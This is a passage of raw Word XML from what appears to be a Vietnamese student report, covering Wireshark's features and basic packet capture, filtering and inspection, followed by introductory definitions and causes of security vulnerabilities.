          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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iểm tra tính bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7E8A0" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Xác minh network applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49942D7F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Gỡ lỗi phát triển các giao thức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A24624" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Phục vụ việc học giao thức mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069A738" w14:textId="7777777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51" w:name="_Toc90050747"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.3. Tính năng của Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="20410EE0"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Phân tích chuyên sâu đến hàng trăm giao thức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE460D7"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Phần mềm được cập nhật liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26642486"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Wireshark hoạt động trên nhiều nền tảng hệ điều hành: Windows, MacOS, Linux, OpenBSD, Solaris… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9EB70"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ho phép chụp trực tiếp dữ liệu của gói ngay trên giao diện mạng và phân tích offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A21D2"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ỗ trợ mở tệp chứa dữ liệu gói được bắt thông qua Wireshark, TCPdump, Windump hay các chương trình bắt gói tin khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C60521F"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ỗ trợ xem các gói tin đã bắt bằng giao diện hoặc dùng command line (tshark).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B717D"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ính năng Display filter mạnh mẽ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D9691"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Giúp người dùng phân tích VoIP chuyên sâu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05D719"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Cung cấp tính năng read, write dưới nhiều định dạng như Microsoft Network Monitor, Cisco Secure IDS iplog, tcpdump (libpcap), Pcap NG, Network General Sniffer®), Sniffer® Pro, NetXray®, NetScreen snoop, Catapult DCT2000, Network Instruments Observer, Novell LANalyzer, Shomiti/Finisar Surveyor, RADCOM WAN/LAN Analyzer, Visual Networks Visual UpTime, Tektronix K12xx, WildPackets EtherPeek/TokenPeek/AiroPeek …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19AA2E"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ung cấp tính năng nén file capture bằng Gzip và giải nén “on the fly”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA292AF"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ắt (capture) tất cả dữ liệu của Ethernet, Bluetooth, USB, Frame Relay, FDDI, IEEE 802.11, PPP/HDLC, ATM, Token Ring, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E21399"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Decryption được hỗ trợ nhiều giao thức, gồm SSL/TLS, WEP, IPsec, SNMPv3, ISAKMP, Kerberos, và WPA/WPA2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316AE1F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ung cấp tính năng Coloring rules cho phép người dùng tùy ý sáng tạo màu sắc của packet theo cá nhân hóa, để tăng tốc độ phân tích và hiệu quả hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822B76D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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19786DDB" wp14:editId="3C1B2142">
            <wp:extent cx="5731200" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41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27"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3941B" w14:textId="7777777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52" w:name="_Toc90050748"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.4. Cách chụp gói tin bằng Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="73B5C2E5" w14:textId="24EF5C62"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Để sử dụng phần mềm,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vào trang web chính thức của Wireshark rồi tải nó về máy tính. Sau đó,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tiến hành cài đặt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02CB65" w14:textId="6292614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Khi đã hoàn tất cài đặt,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mở phần mềm Wireshark và nhấn đúp chuột vào tên giao diện mạng bất kỳ trong phần Capture để chụp các gói tin có trên giao diện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941B370" w14:textId="45EBDD55"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 xml:space="preserve">Ví dụ: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ần ghi lại traffic của mạng không dây thì nhấn đúp chuột vào giao diện không dây. Sau đó, màn hình hiển thị các gói theo thời gian thực và Wireshark tiến hành chụp mỗi gói đã gửi đến hệ thống, hoặc từ hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DB00B" w14:textId="2B3F6573"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Ngoài ra, nếu muốn cấu hình thêm các tính năng nâng cao,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lick chọn Capture, rồi chọn tiếp Options. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA78676"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77D7AB61" wp14:editId="27D6903E">
            <wp:extent cx="5731200" cy="3136900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="411"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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3136900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE4F6F"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6D68527E" wp14:editId="56319FE9">
            <wp:extent cx="5731200" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="412"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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A24D4" w14:textId="05545D71"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Thông thường, Wireshark bật chế độ mặc định là Promiscuous. Chế độ này cho phép người dùng nhìn thấy mọi gói có trên mạng. Để kiểm tra Promiscuous đã được kích hoạt hay chưa,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nhấn chọn Capture, kế đến chọn tiếp Options, rồi di chuyển đến </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>phần cuối cùng của hộp thoại xem mục Enable promiscuous mode on all interfaces được kích hoạt chưa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568381C7"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48D09C77" wp14:editId="060F4D83">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="413"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30"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1681F1" w14:textId="36C860DA"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Trong trường hợp,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muốn capturing traffic dừng thì click vào nút Stop (biểu tượng ô vuông màu đỏ ở góc trái phía trên của màn hình). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083BB71" w14:textId="603FA12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53" w:name="_Toc90050749"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.5. Hướng dẫn cách Color Coding trong Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="28BA9D11"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Wireshark dùng màu sắc để xác định và phân loại lưu lượng truy cập. Mặc định, màu xanh dương nhạt được dùng để chỉ lưu lượng UDP, còn lưu lượng TCP có màu tím nhạt, riêng các gói có lỗi thì được phần mềm sử dụng màu đen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2865CD" w14:textId="19B16606"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Để biết ý nghĩa của bảng mã màu,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họn tab View rồi tiếp tục nhấn Coloring rules. Tuy nhiên, Wireshark cho phép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tùy ý điều chỉnh quy tắc của mã màu nên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ó thể thay đổi theo nhu cầu sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD62E09"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141D4A9F" wp14:editId="42C479CC">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="414"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31"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0CA77" w14:textId="7777777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54" w:name="_Toc90050750"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.6. Cách mở và sao lưu gói tin trong Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="0A53FDBE" w14:textId="34241588"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Wiki của Wireshark chứa một trang gồm các tệp tin mẫu để người dùng tải và kiểm tra. Để mở tệp,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nhấn vào File và chọn Open rồi duyệt tìm kiếm tên của tệp cần mở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533A1293" w14:textId="3F7E50F1"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Bên cạnh đó,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òn được phép sao lưu các ảnh chụp trong Wireshark để sử dụng sau này. Bằng cách,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nhấn vào File và chọn Save để lưu những gói tin đã chụp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E78636"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06815E41" wp14:editId="2C09A09B">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="415"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32"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14CCA3" w14:textId="7777777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55" w:name="_Toc90050751"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.4.7. Cách lọc gói tin trong Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="0EFB6F58"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Cách áp dụng bộ lọc Wireshark đơn giản nhất là nhập nó vào hộp bộ lọc rồi nhấp nút Apply hoặc phím Enter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB4C8C" w14:textId="14ED9421"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Ví dụ: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nhập DNS vào bộ lọc thì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hỉ thấy tất cả các gói tin DNS. Đồng thời, ngay khi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nhập, Wireshark cũng tự động hoàn thành bộ lọc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E47EF0"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08632E9B" wp14:editId="5FFFB10C">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="387"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33"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE67C20" w14:textId="1F6797C1"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Ngoài ra,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ó thể nhấn chọn Analyze, rồi chọn tiếp Display Filters để tùy ý chọn bộ lọc trong hệ thống bộ lọc mặc định của phần mềm. Sau đó,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điều chỉnh bộ lọc theo cá nhân hóa, nhằm phục vụ cho nhu cầu của mình rồi nhấn nút lưu lại để sử dụng cho các lần truy cập kế tiếp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834C7A4" w14:textId="7067530E"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Để xem cuộc hội thoại TCP giữa máy chủ và máy khách,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nhấn chọn Follow và chọn tiếp TCP Stream. Bên cạnh đó,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ũng có thể xem được cuộc hội thoại của các giao thức khác, bằng cách nhấn vào tên giao thức trong trình Follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBCDB3"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6F37F0CC" wp14:editId="501DC156">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6F0DE3" w14:textId="22F6511D"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Cuối cùng,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đóng cửa sổ và bộ lộc mới đã điều chỉnh theo cá nhân hóa sẽ được Wireshark tự động áp dụng. Tiếp đến, phần mềm Wireshark sẽ hiển thị các gói đã hình thành nên một cuộc trò chuyện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174B0B4" w14:textId="7777777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56" w:name="_Toc90050752"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4.8. Cách kiểm tra gói tin trong Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="24ABD12B" w14:textId="3624C3A6"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Để kiểm tra gói tin,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lick chuột vào tên của nó thì ngay lập tức hệ thống sẽ hiển thị các thông tin chi tiết về nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E842820" w14:textId="77777777"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208EEA91" wp14:editId="25C98CDA">
            <wp:extent cx="5731200" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="389"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35"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0434BB" w14:textId="5B2CE1C8" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pP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 xml:space="preserve">Ngay trong bản chi tiết này,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ũng được phép tạo bộ lọc con. Cách thực hiện khá đơn giản. Đó là,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nhấn phải chuột vào một thông tin chi tiết rồi dùng menu Apply as Filter để thiết lập bộ lọc con.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67D35C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc90050753"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2.5. Khai thác lỗ hổng bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="0D2439B5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc90050754"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1. Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="41C67A98" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc90050755"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.1. Lỗ hổng bảo mật là gì?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="7659E8A4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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Lỗ hổng bảo mật là những điểm yếu tồn tại trong hệ thống mạng. Xét về bản chất, lỗ hổng vốn dĩ không gây hại, ngoại trừ việc ảnh hưởng đến hiệu suất tiềm năng của công nghệ. Chúng chỉ gây hại khi bị khai thác bởi tin tặc. Nếu tin tặc khai thác lỗ hổng thành công, chúng có thể xâm nhập trái phép vào hệ thống mạng. Từ đó, chiếm đoạt dữ liệu hoặc làm gián đoạn hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723ECA18" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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Lỗ hổng bảo mật có thể tồn tại ở bất cứ đâu từ phần cứng đến phần mềm. Doanh nghiệp có thể tìm thấy lỗ hổng ở các thiết bị mạng, thiết bị IoT hay website, mã nguồn… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDBF7EC" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc90050756"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.2. Nguyên nhân gây ra lỗ hổng bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="2AC306A8" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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ó nhiều nguyên nhân gây ra lỗ hổng bảo mật và dưới đây là ba nguyên nhân chính: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3207E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Lỗi phần mềm.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Trong quá trình phát triển phần mềm, lập trình viên có thể vô ý tạo ra các lỗi. Các lỗi này chính là nguyên nhân khiến lỗ hổng xuất hiện. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226243DD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Lỗi của ứng dụng, hệ điều hành</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Bản thân các ứng dụng và hệ điều hành cũng tồn tại các lỗ hổng bảo mật. Đó là lý do doanh nghiệp luôn phải cập nhật ứng dụng và hệ điều hành lên phiên bản mới nhất. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED230B4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Lỗi người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Nhân sự chưa được đào tạo về bảo mật. Ví dụ: đặt mật khẩu yếu, click vào các đường link lạ hoặc tải về các tệp tin độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A344CD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc90050757"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3. Các loại lỗ hổng bảo mật</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="22935D64" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc90050758"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
